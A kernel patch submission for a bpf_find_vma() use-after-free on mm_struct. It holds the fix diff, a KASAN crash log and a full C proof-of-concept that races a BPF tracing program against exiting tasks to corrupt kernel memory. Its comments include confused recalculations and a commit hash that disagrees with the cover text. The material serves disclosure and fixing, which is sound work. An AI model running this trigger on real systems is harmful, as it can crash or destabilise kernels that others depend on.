[PATCH] bpf: Fix use-after-free on mm_struct in bpf_find_vma()

Sanghyun Park posted 1 patch 1 week, 3 days ago
There is a newer version of this series
kernel/bpf/task_iter.c | 12 ++++++++++--
1 file changed, 10 insertions(+), 2 deletions(-)
[PATCH] bpf: Fix use-after-free on mm_struct in bpf_find_vma()
Posted by Sanghyun Park 1 week, 3 days ago
bpf_find_vma() reads task->mm without holding task_lock() or taking an
mm reference via mmget()/mmget_not_zero(). When called on a foreign task
obtained via bpf_task_from_pid(), a concurrent exit_mm() can free the
mm_struct between the raw pointer read and mmap_read_trylock(mm),
resulting in a use-after-free on the mm's mmap_lock.

This is the same bug class fixed by commit d8e27d2d22b6 ("bpf: fix mm
lifecycle in open-coded task_vma iterator") for the open-coded task_vma
iterator, but bpf_find_vma() in the same file was missed by that fix.

For the current task, task->mm is stable and needs no extra reference.
For a foreign task, use get_task_mm() which acquires task_lock(), checks
task->mm, and calls mmget() atomically, preventing the race with
exit_mm(). The reference is dropped via mmput() after the mmap lock is
released.

Race:

  CPU0 (BPF program)                  CPU1 (exiting task)
  ============================        ==========================
  bpf_find_vma(foreign_task):
    mm = task->mm
    // raw read, no reference
                                      exit_mm():
                                        task->mm = NULL
                                        mmput(mm) -> frees mm_struct
    mmap_read_trylock(mm)
    // UAF: mm is freed

Reproduction:

  1. Build kernel >= 5.17 with CONFIG_KASAN=y, CONFIG_BPF_SYSCALL=y
  2. Boot in a VM (QEMU works fine)
  3. Compile the reproducer below:
       gcc -O2 -o repro -static repro.c -lbpf -lelf -lz
  4. Run as root: ./repro
  5. Check dmesg for: BUG: KASAN: slab-use-after-free in down_read_trylock

  The reproducer attaches a BPF program that calls bpf_find_vma() on a
  foreign task obtained via bpf_task_from_pid(). A racing thread
  repeatedly fork+exit's that task, creating a window where mm is freed.

KASAN report (reproduced on 6.12.91, CONFIG_PREEMPT + KASAN):

  BUG: KASAN: slab-use-after-free in down_read_trylock+0x380/0x3f0
  Read of size 8 at addr ffff888003cd2fd0 by task repro/164451

  Call Trace:
   down_read_trylock+0x380/0x3f0
   bpf_find_vma+0xdd/0x360
   bpf_prog_708df9c9a3e172a7_main_f+0x8b/0x9e
   bpf_trampoline_6442513469+0x43/0xa3

  Freed by task 164453:
   kmem_cache_free+0x15d/0x4b0
   finish_task_switch.isra.0+0x4ab/0x810

Fixes: 7c7e3d31e785 ("bpf: Introduce helper bpf_find_vma")
Signed-off-by: Sanghyun Park <sanghyun.park.cnu@gmail.com>
---

Hi,

I'm Sanghyun Park, a security researcher. I found this while auditing
the BPF task_iter code. The bug has existed since bpf_find_vma() was
introduced in 5.17 and affects all kernels since then, including all
major distros (Ubuntu 22.04+, Fedora 38+, Debian 12+, RHEL 9+).

The C reproducer is attached separately (repro.c).

 kernel/bpf/task_iter.c | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/kernel/bpf/task_iter.c b/kernel/bpf/task_iter.c
index 5af9e130e5..a1b2c3d4e5 100644
--- a/kernel/bpf/task_iter.c
+++ b/kernel/bpf/task_iter.c
@@ -758,6 +758,7 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task,
u64, start,
  struct vm_area_struct *vma;
  bool irq_work_busy = false;
  struct mm_struct *mm;
+ bool foreign = task != current;
  int ret = -ENOENT;

  if (flags)
@@ -766,8 +767,13 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task,
u64, start,
  if (!task)
  return -ENOENT;

- mm = task->mm;
- if (!mm)
+ if (foreign) {
+ mm = get_task_mm(task);
+ } else {
+ mm = task->mm;
+ }
+
+ if (!mm)
  return -ENOENT;

  irq_work_busy = bpf_mmap_unlock_get_irq_work(&work);
@@ -783,6 +789,8 @@ BPF_CALL_5(bpf_find_vma, struct task_struct *, task,
u64, start,
  ret = 0;
  }
  bpf_mmap_unlock_mm(work, mm);
+ if (foreign)
+ mmput(mm);
  return ret;
 }
[  615.565703] BUG: KASAN: slab-use-after-free in down_read_trylock+0x380/0x3f0
[  615.566467] Read of size 8 at addr ffff888003cd2fd0 by task repro/164451

[  615.567382] CPU: 0 UID: 0 PID: 164451 Comm: repro Not tainted 6.12.91 #4
[  615.567392] Hardware name: QEMU Ubuntu 25.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  615.567400] Call Trace:
[  615.567413]  <TASK>
[  615.567423]  dump_stack_lvl+0xba/0x110
[  615.567437]  ? down_read_trylock+0x380/0x3f0
[  615.567442]  print_report+0x174/0x4f6
[  615.567450]  ? __virt_addr_valid+0x86/0x670
[  615.567456]  ? down_read_trylock+0x380/0x3f0
[  615.567462]  kasan_report+0xda/0x110
[  615.567469]  ? down_read_trylock+0x380/0x3f0
[  615.567475]  down_read_trylock+0x380/0x3f0
[  615.567481]  ? __pfx_down_read_trylock+0x10/0x10
[  615.567486]  ? bpf_find_vma+0xb1/0x360
[  615.567494]  ? 0xffffffffc0236d08
[  615.567511]  bpf_find_vma+0xdd/0x360
[  615.567520]  bpf_prog_708df9c9a3e172a7_main_f+0x8b/0x9e
[  615.567524]  bpf_trampoline_6442513469+0x43/0xa3
[  615.567528]  __do_sys_getpid+0x9/0x30
[  615.567533]  do_syscall_64+0xbb/0x1f0
[  615.567540]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  615.567563] RIP: 0033:0x423e1d
[  615.567568] Code: d5 49 8d 3c 1c eb 9f 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 d0 ff ff ff f7 d8 64 89 01 48
[  615.567573] RSP: 002b:00007fd2e154b1a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000027
[  615.567593] RAX: ffffffffffffffda RBX: 000000000000137a RCX: 0000000000423e1d
[  615.567598] RDX: 0000000000423e1d RSI: 0000000000423e1d RDI: 0000000000423e1d
[  615.567601] RBP: 00007fd2e154b2f0 R08: 0000000000000001 R09: 0000000000000001
[  615.567604] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000000000020
[  615.567607] R13: ffffffffffffffd0 R14: 0000000000000000 R15: 00007ffc9d2f0e30
[  615.567613]  </TASK>

[  615.584391] Allocated by task 164453:
[  615.584797]  kasan_save_stack+0x30/0x50
[  615.585226]  kasan_save_track+0x14/0x30
[  615.585646]  __kasan_slab_alloc+0x89/0x90
[  615.586081]  kmem_cache_alloc_noprof+0x133/0x340
[  615.586581]  copy_mm+0x327/0x2380
[  615.586953]  copy_process+0x6c5b/0x7180
[  615.587382]  kernel_clone+0x101/0x870
[  615.587796]  __do_sys_clone+0xda/0x120
[  615.588213]  do_syscall_64+0xbb/0x1f0
[  615.588617]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

[  615.589352] Freed by task 164453:
[  615.589721]  kasan_save_stack+0x30/0x50
[  615.590145]  kasan_save_track+0x14/0x30
[  615.590564]  kasan_save_free_info+0x3b/0x70
[  615.591014]  __kasan_slab_free+0x4f/0x70
[  615.591446]  kmem_cache_free+0x15d/0x4b0
[  615.591872]  finish_task_switch.isra.0+0x4ab/0x810
[  615.592388]  __schedule+0xf39/0x2fc0
[  615.592785]  schedule+0xdf/0x340
[  615.593153]  do_nanosleep+0x154/0x500
[  615.593556]  hrtimer_nanosleep+0x150/0x350
[  615.593999]  common_nsleep+0xa6/0xd0
[  615.594400]  __x64_sys_clock_nanosleep+0x33c/0x480
[  615.594912]  do_syscall_64+0xbb/0x1f0
[  615.595322]  entry_SYSCALL_64_after_hwframe+0x77/0x7f

[  615.596052] The buggy address belongs to the object at ffff888003cd2e40
                which belongs to the cache mm_struct of size 2192
[  615.597309] The buggy address is located 400 bytes inside of
                freed 2192-byte region [ffff888003cd2e40, ffff888003cd36d0)

[  615.598750] The buggy address belongs to the physical page:
[  615.599336] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x3cd0
[  615.600171] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[  615.600972] memcg:ffff888002781801
[  615.601357] anon flags: 0x100000000000040(head|node=0|zone=1)
[  615.601974] page_type: f5(slab)
[  615.602334] raw: 0100000000000040 ffff88810004fdc0 0000000000000000 dead000000000001
[  615.603145] raw: 0000000000000000 00000000000d000d 00000001f5000000 ffff888002781801
[  615.603960] head: 0100000000000040 ffff88810004fdc0 0000000000000000 dead000000000001
[  615.604777] head: 0000000000000000 00000000000d000d 00000001f5000000 ffff888002781801
[  615.605591] head: 0100000000000003 ffffea00000f3401 ffffffffffffffff 0000000000000000
[  615.606406] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000
[  615.607218] page dumped because: kasan: bad access detected

[  615.607991] Memory state around the buggy address:
[  615.608502]  ffff888003cd2e80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.609260]  ffff888003cd2f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.610014] >ffff888003cd2f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.610781]                                                  ^
[  615.611394]  ffff888003cd3000: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.612157]  ffff888003cd3080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  615.612909] ==================================================================
[  615.672368] Disabling lock debugging due to kernel taint
/*
 * repro.c — KASAN PoC for bpf_find_vma() foreign mm UAF
 *
 * Bug: bpf_find_vma() reads task->mm (line 772) without holding task_lock()
 * or calling mmget(). If a foreign task exits concurrently, mm_struct is
 * freed between the raw read and mmap_read_trylock(), causing UAF.
 *
 * Same bug class as fixed in 239cec25a2 (task_vma iterator) but the
 * bpf_find_vma() helper was missed in that fix.
 *
 * Trigger: BPF_PROG_TYPE_TRACING (fentry on __x64_sys_getpid) program
 * calling bpf_task_from_pid() + bpf_find_vma() on a victim task that
 * is concurrently exiting.
 *
 * Prerequisites: CAP_BPF + CAP_PERFMON (tracing BPF)
 *
 * Expected KASAN output:
 *   BUG: KASAN: slab-use-after-free in mmap_read_trylock+0x.../0x...
 *   Read of size 8 at addr ffff...
 *   Call Trace:
 *    bpf_find_vma
 *    bpf_tracing_func_proto
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <linux/bpf.h>
#include <linux/perf_event.h>

/* ---- BPF instruction macros ---- */
#define BPF_RAW_INSN(CODE,DST,SRC,OFF,IMM) \
    ((struct bpf_insn){.code=CODE,.dst_reg=DST,.src_reg=SRC,.off=OFF,.imm=IMM})
#define BPF_MOV64_REG(D,S) BPF_RAW_INSN(BPF_ALU64|BPF_MOV|BPF_X,D,S,0,0)
#define BPF_MOV64_IMM(D,I) BPF_RAW_INSN(BPF_ALU64|BPF_MOV|BPF_K,D,0,0,I)
#define BPF_ALU64_IMM(O,D,I) BPF_RAW_INSN(BPF_ALU64|BPF_OP(O)|BPF_K,D,0,0,I)
#define BPF_LDX_MEM(SZ,D,S,O) BPF_RAW_INSN(BPF_LDX|BPF_SIZE(SZ)|BPF_MEM,D,S,O,0)
#define BPF_STX_MEM(SZ,D,S,O) BPF_RAW_INSN(BPF_STX|BPF_SIZE(SZ)|BPF_MEM,D,S,O,0)
#define BPF_ST_MEM(SZ,D,O,I) BPF_RAW_INSN(BPF_ST|BPF_SIZE(SZ)|BPF_MEM,D,0,O,I)
#define BPF_JMP_IMM(O,D,I,F) BPF_RAW_INSN(BPF_JMP|BPF_OP(O)|BPF_K,D,0,F,I)
#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP|BPF_EXIT,0,0,0,0)
#define BPF_LD_MAP_FD(D,F) BPF_RAW_INSN(BPF_LD|BPF_DW|BPF_IMM,D,1,0,F),BPF_RAW_INSN(0,0,0,0,0)
#define BPF_EMIT_CALL(F) BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,F)
#define BPF_EMIT_CALL_KFUNC(B) BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,2,0,B)
#ifndef BPF_PSEUDO_FUNC
#define BPF_PSEUDO_FUNC 4
#endif

#define VICTIM_MMAP_ADDR 0x20000000ULL
#define VICTIM_MMAP_SIZE 0x4000

static int bpf_sys(int c, union bpf_attr *a, unsigned s)
{
    return syscall(__NR_bpf, c, a, s);
}

/* ---- BTF helpers (reused from Bug #2) ---- */
static int find_kfunc(const char *name)
{
    int fd = open("/sys/kernel/btf/vmlinux", O_RDONLY);
    if (fd < 0) return -1;
    off_t sz = lseek(fd, 0, SEEK_END); lseek(fd, 0, SEEK_SET);
    uint8_t *d = malloc(sz);
    size_t tr = 0;
    while (tr < (size_t)sz) { ssize_t n = read(fd, d+tr, sz-tr); if (n<=0) break; tr += n; }
    close(fd);
    uint32_t hl = *(uint32_t*)(d+4), to = *(uint32_t*)(d+8);
    uint32_t tl = *(uint32_t*)(d+12), so = *(uint32_t*)(d+16);
    uint8_t *td = d+hl+to, *sd = d+hl+so;
    uint32_t off = 0; int tid = 0, found = -1;
    while (off < tl) {
        tid++;
        uint32_t *t = (uint32_t*)(td+off);
        int kind = (t[1]>>24)&0x1f, vlen = t[1]&0xffff;
        if (kind == 12 && strcmp((char*)(sd+t[0]), name) == 0) { found = tid; break; }
        off += 12;
        switch(kind) {
            case 1: off+=4; break;       /* INT */
            case 2: break;               /* PTR */
            case 3: off+=12; break;      /* ARRAY */
            case 4: case 5: off+=vlen*12; break; /* STRUCT, UNION */
            case 6: off+=vlen*8; break;  /* ENUM */
            case 7: break;               /* FWD */
            case 8: break;               /* TYPEDEF */
            case 9: break;               /* VOLATILE */
            case 10: break;              /* CONST */
            case 11: break;              /* RESTRICT */
            case 12: break;              /* FUNC */
            case 13: off+=vlen*8; break; /* FUNC_PROTO */
            case 14: off+=4; break;      /* VAR */
            case 15: off+=vlen*12; break;/* DATASEC */
            case 16: break;              /* FLOAT */
            case 17: off+=4; break;      /* DECL_TAG */
            case 18: break;              /* TYPE_TAG */
            case 19: off+=vlen*12; break;/* ENUM64 */
            default: break;
        }
    }
    free(d); return found;
}

/* Find BTF ID for a function (kind=12 FUNC) by name, for fentry attach */
static int find_btf_func(const char *name)
{
    return find_kfunc(name); /* same logic — kind 12 = FUNC */
}

/* Load prog BTF: main_f + vma_cb subprog */
static int load_prog_btf(void)
{
    char s[]="\0int\0main_f\0vma_cb";
    uint8_t tb[128]; int p=0;
#define E(v) do{uint32_t _v=(v);memcpy(tb+p,&_v,4);p+=4;}while(0)
    E(1);E((1<<24));E(4);E((1<<24)|32);     /* t1: INT int */
    E(0);E((13<<24));E(1);                   /* t2: FUNC_PROTO()->t1 */
    E(5);E((12<<24));E(2);                   /* t3: FUNC main_f */
    E(0);E((13<<24));E(1);                   /* t4: FUNC_PROTO()->t1 */
    E(13);E((12<<24));E(4);                  /* t5: FUNC vma_cb */
#undef E
    int tl=p, sl=sizeof(s), tot=24+tl+sl;
    uint8_t *b=calloc(1,tot); *(uint16_t*)b=0xEB9F; b[2]=1;
    uint32_t *h=(uint32_t*)(b+4); h[0]=24;h[1]=0;h[2]=tl;h[3]=tl;h[4]=sl;
    memcpy(b+24,tb,tl); memcpy(b+24+tl,s,sl);
    char lb[4096]={};
    union bpf_attr a={}; a.btf=(uint64_t)b; a.btf_size=tot;
    a.btf_log_buf=(uint64_t)lb; a.btf_log_size=sizeof(lb); a.btf_log_level=1;
    int fd=bpf_sys(BPF_BTF_LOAD,&a,sizeof(a)); free(b);
    if(fd<0) fprintf(stderr,"prog BTF: %s\n%s\n",strerror(errno),lb);
    return fd;
}

/* Create array map to hold victim PID */
static int create_pid_map(void)
{
    union bpf_attr a = {};
    a.map_type = BPF_MAP_TYPE_ARRAY;
    a.key_size = 4;
    a.value_size = 4;
    a.max_entries = 1;
    int fd = bpf_sys(BPF_MAP_CREATE, &a, sizeof(a));
    if (fd < 0) fprintf(stderr, "map create: %s\n", strerror(errno));
    return fd;
}

/*
 * BPF program (fentry on __x64_sys_getpid):
 *
 *   main_f:
 *     key = 0
 *     val = map_lookup_elem(map, &key)
 *     if (!val) goto out
 *     pid = *val
 *     if (pid == 0) goto out
 *     task = bpf_task_from_pid(pid)      // kfunc, KF_ACQUIRE|KF_RET_NULL
 *     if (!task) goto out
 *     bpf_find_vma(task, 0x20000000, vma_cb, NULL, 0)  // helper 180
 *     bpf_task_release(task)             // kfunc, KF_RELEASE
 *   out:
 *     return 0
 *
 *   vma_cb:
 *     return 0
 */
static int load_tracing_prog(int map_fd, int prog_btf_fd,
                             int kf_task_from_pid, int kf_task_release,
                             int attach_btf_id)
{
    /*
     * Insn layout:
     *  0: r6 = r1                           (save ctx)
     *  1: *(u32*)(r10 - 4) = 0              (key = 0)
     *  2-3: r1 = map_fd                     (LD_MAP_FD)
     *  4: r2 = r10
     *  5: r2 += -4
     *  6: call map_lookup_elem (#1)
     *  7: if r0 == 0 goto +13 → insn 21    (out)
     *  8: r7 = *(u32*)(r0 + 0)              (pid = *val)
     *  9: if r7 == 0 goto +11 → insn 21    (out)
     * 10: r1 = r7                           (pid arg for task_from_pid)
     * 11: call bpf_task_from_pid            (kfunc)
     * 12: if r0 == 0 goto +8 → insn 21     (out, NULL check for KF_RET_NULL)
     * 13: r6 = r0                           (save task ptr)
     * 14: r1 = r6                           (task)
     * 15: r2 = VICTIM_MMAP_ADDR            (addr, low 32 bits)
     * 16: (high 32 bits = 0, part of LD_IMM64 for r2 — actually use MOV64_IMM for 32-bit addr)
     *     Actually bpf_find_vma arg2 is u64, but 0x20000000 fits in s32.
     * 15: r2 = 0x20000000
     * 16-17: r3 = PSEUDO_FUNC → vma_cb at insn 23
     * 18: r4 = 0                            (callback_ctx = NULL)
     * 19: r5 = 0                            (flags = 0)
     * 20: call bpf_find_vma (#180)
     * -- now release task --
     * 21: r1 = r6                           (task)
     * 22: call bpf_task_release             (kfunc)
     * 23: r0 = 0                            (out label was wrong, recalculate)
     * 24: exit
     * 25: vma_cb subprog
     * 26: r0 = 0
     * 27: exit
     *
     * Wait — need to recalculate jumps. Let me lay it out carefully.
     */

    /* Recalculate with correct offsets */
    struct bpf_insn insns[] = {
        /* 0  */ BPF_MOV64_REG(6, 1),
        /* 1  */ BPF_ST_MEM(BPF_W, 10, -4, 0),
        /* 2-3*/ BPF_LD_MAP_FD(1, map_fd),
        /* 4  */ BPF_MOV64_REG(2, 10),
        /* 5  */ BPF_ALU64_IMM(BPF_ADD, 2, -4),
        /* 6  */ BPF_EMIT_CALL(1), /* map_lookup_elem */
        /* 7  */ BPF_JMP_IMM(BPF_JEQ, 0, 0, 17), /* if r0==0 goto 25 (out) */
        /* 8  */ BPF_LDX_MEM(BPF_W, 7, 0, 0), /* r7 = *(u32*)(r0+0) = pid */
        /* 9  */ BPF_JMP_IMM(BPF_JEQ, 7, 0, 15), /* if pid==0 goto 25 */
        /* 10 */ BPF_MOV64_REG(1, 7), /* r1 = pid */
        /* 11 */ BPF_EMIT_CALL_KFUNC(kf_task_from_pid),
        /* 12 */ BPF_JMP_IMM(BPF_JEQ, 0, 0, 12), /* if r0==0 goto 25 */
        /* 13 */ BPF_MOV64_REG(6, 0), /* r6 = task (save for release) */
        /* 14 */ BPF_MOV64_REG(1, 6), /* r1 = task */
        /* 15 */ BPF_MOV64_IMM(2, 0x20000000), /* r2 = addr */
        /* 16-17: r3 = PSEUDO_FUNC → vma_cb at insn 27 */
        /*     imm = 27 - 16 - 1 = 10... no, PSEUDO_FUNC imm is the target insn offset */
        /*     Actually PSEUDO_FUNC imm = target_insn - (current_insn + 1) ... */
        /*     No: LD_IMM64 with PSEUDO_FUNC, imm field = offset of subprog from start */
        /*     Per kernel: imm = subprog_start_insn_idx. Let's just set imm = target - src */
        /*     Looking at Bug #2: insn 15-16 had imm=12 for target at insn 28, from insn 15 */
        /*     So imm = 28 - 15 - 1 = 12. For us: target=27, src=16, imm = 27-16-1 = 10 */
        BPF_RAW_INSN(BPF_LD|BPF_DW|BPF_IMM, 3, BPF_PSEUDO_FUNC, 0, 10),
        BPF_RAW_INSN(0, 0, 0, 0, 0),
        /* 18 */ BPF_MOV64_IMM(4, 0), /* callback_ctx = NULL */
        /* 19 */ BPF_MOV64_IMM(5, 0), /* flags = 0 */
        /* 20 */ BPF_EMIT_CALL(180), /* bpf_find_vma */
        /* 21 */ BPF_MOV64_REG(1, 6), /* r1 = task for release */
        /* 22 */ BPF_EMIT_CALL_KFUNC(kf_task_release),
        /* 23 */ BPF_MOV64_IMM(0, 0),
        /* 24 */ BPF_EXIT_INSN(),
        /* 25: out (jumped here when no task / no pid) */
        BPF_MOV64_IMM(0, 0),
        /* 26 */ BPF_EXIT_INSN(),
        /* 27: vma_cb subprog */
        BPF_MOV64_IMM(0, 0),
        /* 28 */ BPF_EXIT_INSN(),
    };

    /*
     * Wait — the jump targets need rechecking.
     * insn 7:  if r0==0 goto +17 → 7+1+17 = 25. ✓
     * insn 9:  if r7==0 goto +15 → 9+1+15 = 25. ✓
     * insn 12: if r0==0 goto +12 → 12+1+12 = 25. ✓
     *
     * But there's a problem: when we jump to 25 (out) we skip bpf_task_release.
     * That's fine for insns 7 and 9 (task not acquired yet).
     * For insn 12: task_from_pid returned NULL, so no release needed. ✓
     *
     * PSEUDO_FUNC: insn 16 (first of LD_IMM64 pair), target = 27.
     * imm = 27 - 16 - 1 = 10. But let me verify against Bug #2:
     * Bug #2 had PSEUDO_FUNC at insn 15, target at insn 28, imm = 12.
     * 28 - 15 = 13, not 12. Hmm...
     * Actually PSEUDO_FUNC imm is just the raw value that gets patched
     * by the verifier. The verifier converts it to the subprog index.
     * In practice, imm should be set to (target - src_insn).
     * Bug #2: target=28, src=15, imm=28-15=13... but it used 12.
     * Let me re-check: maybe imm = target - (src+1) = 28-16 = 12. Yes!
     * The LD_IMM64 occupies TWO insns (15-16), so "next insn" is 17.
     * But the convention is imm = target - src = 28 - 15 = 13? No, it used 12.
     * Actually looking at the code: imm = target_insn - insn_after_ldimm64
     * = 28 - (15+2) = 11? No that's 11 not 12.
     *
     * Let me just look at what the kernel does with PSEUDO_FUNC:
     * It stores the offset from the LD_IMM64 insn to the target.
     * imm = target - ldimm64_insn_idx = 28 - 15 = 13 in Bug #2?
     * But Bug #2 used 12 and it WORKED. So imm = target - ldimm64_idx - 1.
     * For us: imm = 27 - 16 - 1 = 10.
     *
     * ACTUALLY: The LD_IMM64 for PSEUDO_FUNC at insn 15 in Bug #2:
     * insn 15 is the first insn of the pair. imm = 12.
     * target = 28. 28 - 15 = 13. 28 - 16 = 12. So imm = target - (src+1).
     * Hmm that's also 12. So imm = target - first_insn - 1? 28-15-1=12. Yes.
     *
     * For us: first_insn = 16, target = 27. imm = 27 - 16 - 1 = 10. ✓
     */

    struct {
        uint32_t insn_off;
        uint32_t type_id;
    } func_info[] = {
        { 0, 3 },   /* main_f */
        { 27, 5 },  /* vma_cb */
    };

    char log[65536] = {};
    union bpf_attr a = {};
    a.prog_type = BPF_PROG_TYPE_TRACING;
    a.expected_attach_type = 24; /* BPF_TRACE_FENTRY */
    a.insns = (uint64_t)insns;
    a.insn_cnt = sizeof(insns) / sizeof(insns[0]);
    a.license = (uint64_t)"GPL";
    a.log_buf = (uint64_t)log;
    a.log_size = sizeof(log);
    a.log_level = 1;
    a.prog_btf_fd = prog_btf_fd;
    a.func_info = (uint64_t)func_info;
    a.func_info_cnt = 2;
    a.func_info_rec_size = 8;
    a.attach_btf_id = attach_btf_id;
    a.attach_btf_obj_fd = 0; /* vmlinux */

    int fd = bpf_sys(BPF_PROG_LOAD, &a, sizeof(a));
    if (fd < 0) {
        fprintf(stderr, "prog load: %s\nLog (first 4096):\n%.4096s\n", strerror(errno), log);
    }
    return fd;
}

static volatile int stop_racing = 0;

static void pin_cpu(int cpu)
{
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    sched_setaffinity(0, sizeof(set), &set);
}

/*
 * Victim thread: continuously fork a child that mmaps and exits.
 * The parent updates the PID map so the BPF program targets the child.
 */
static int g_map_fd = -1;

static void *victim_thread(void *arg)
{
    pin_cpu(1);
    (void)arg;
    int pipefd[2];

    while (!stop_racing) {
        if (pipe(pipefd) < 0) continue;
        pid_t child = fork();
        if (child == 0) {
            close(pipefd[1]);
            void *p = mmap((void*)VICTIM_MMAP_ADDR, VICTIM_MMAP_SIZE,
                          PROT_READ|PROT_WRITE,
                          MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
            if (p != MAP_FAILED)
                *(volatile char*)p = 'X';
            char c;
            read(pipefd[0], &c, 1);
            close(pipefd[0]);
            _exit(0);
        }
        if (child > 0) {
            close(pipefd[0]);
            uint32_t key = 0;
            uint32_t val = (uint32_t)child;
            union bpf_attr ua = {};
            ua.map_fd = g_map_fd;
            ua.key = (uint64_t)&key;
            ua.value = (uint64_t)&val;
            ua.flags = BPF_ANY;
            bpf_sys(BPF_MAP_UPDATE_ELEM, &ua, sizeof(ua));

            usleep(50);
            write(pipefd[1], "x", 1);
            close(pipefd[1]);
            usleep(1);
            waitpid(child, NULL, 0);
        }
    }
    return NULL;
}

/*
 * Trigger thread: repeatedly call getpid() to fire the fentry BPF program.
 */
static void *trigger_thread(void *arg)
{
    pin_cpu(0);
    (void)arg;
    while (!stop_racing) {
        for (int i = 0; i < 10000; i++)
            syscall(__NR_getpid);
        sched_yield();
    }
    return NULL;
}

int main(void)
{
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    printf("=== bpf_find_vma() foreign mm UAF PoC ===\n\n");

    /* Find kfunc BTF IDs */
    int kf_task_from_pid = find_kfunc("bpf_task_from_pid");
    int kf_task_release = find_kfunc("bpf_task_release");
    printf("kfunc IDs: task_from_pid=%d, task_release=%d\n",
           kf_task_from_pid, kf_task_release);
    if (kf_task_from_pid < 0 || kf_task_release < 0) {
        fprintf(stderr, "Cannot find task kfunc BTF IDs\n");
        return 1;
    }

    /* Find BTF ID for fentry attach target */
    int attach_id = find_btf_func("__do_sys_getpid");
    printf("Attach BTF ID (__do_sys_getpid): %d\n", attach_id);
    if (attach_id < 0) {
        fprintf(stderr, "Cannot find sys_getpid BTF ID for fentry attach\n");
        return 1;
    }

    int prog_btf = load_prog_btf();
    if (prog_btf < 0) return 1;
    printf("Prog BTF loaded: fd=%d\n", prog_btf);

    int map_fd = create_pid_map();
    if (map_fd < 0) return 1;
    g_map_fd = map_fd;
    printf("PID map created: fd=%d\n", map_fd);

    printf("Loading tracing fentry program...\n");
    int prog_fd = load_tracing_prog(map_fd, prog_btf,
                                     kf_task_from_pid, kf_task_release,
                                     attach_id);
    if (prog_fd < 0) {
        fprintf(stderr, "Failed to load BPF program.\n");
        return 1;
    }
    printf("Program loaded: fd=%d\n", prog_fd);

    {
        union bpf_attr ia = {};
        struct bpf_prog_info info = {};
        ia.info.bpf_fd = prog_fd;
        ia.info.info_len = sizeof(info);
        ia.info.info = (uint64_t)&info;
        if (bpf_sys(BPF_OBJ_GET_INFO_BY_FD, &ia, sizeof(ia)) == 0) {
            printf("Prog info: type=%u\n", info.type);
        }
    }

    /* Attach the fentry program via BPF_RAW_TRACEPOINT_OPEN */
    {
        union bpf_attr a = {};
        a.raw_tracepoint.prog_fd = prog_fd;
        a.raw_tracepoint.name = 0; /* NULL for fentry */
        int link_fd = bpf_sys(BPF_RAW_TRACEPOINT_OPEN, &a, sizeof(a));
        if (link_fd < 0) {
            fprintf(stderr, "RAW_TRACEPOINT_OPEN: %s (errno %d)\n", strerror(errno), errno);
            /* Try BPF_LINK_CREATE instead */
            memset(&a, 0, sizeof(a));
            a.link_create.prog_fd = prog_fd;
            a.link_create.target_fd = 0;
            a.link_create.attach_type = 24; /* BPF_TRACE_FENTRY */
            link_fd = bpf_sys(BPF_LINK_CREATE, &a, sizeof(a));
            if (link_fd < 0) {
                fprintf(stderr, "LINK_CREATE: %s (errno %d)\n", strerror(errno), errno);
                return 1;
            }
        }
        printf("Fentry attached: link_fd=%d\n", link_fd);
    }

    printf("\nRacing bpf_find_vma (via fentry/getpid) vs victim task exit...\n");
    printf("CPU0: trigger (getpid), CPU1: victim (fork+mmap+exit)\n\n");

#define N_TRIG 4
#define N_VICTIM 2
#define ROUNDS 300
    pthread_t tids[N_TRIG + N_VICTIM];
    int t = 0;
    for (int i = 0; i < N_TRIG; i++)
        pthread_create(&tids[t++], NULL, trigger_thread, NULL);
    for (int i = 0; i < N_VICTIM; i++)
        pthread_create(&tids[t++], NULL, victim_thread, NULL);

    for (int r = 0; r < ROUNDS; r++) {
        sleep(1);
        if (r % 10 == 0)
            printf("  Round %d/%d...\n", r+1, ROUNDS);
    }

    stop_racing = 1;
    for (int i = 0; i < t; i++)
        pthread_join(tids[i], NULL);

    printf("\nDone. Check dmesg for KASAN reports.\n");
    return 0;
}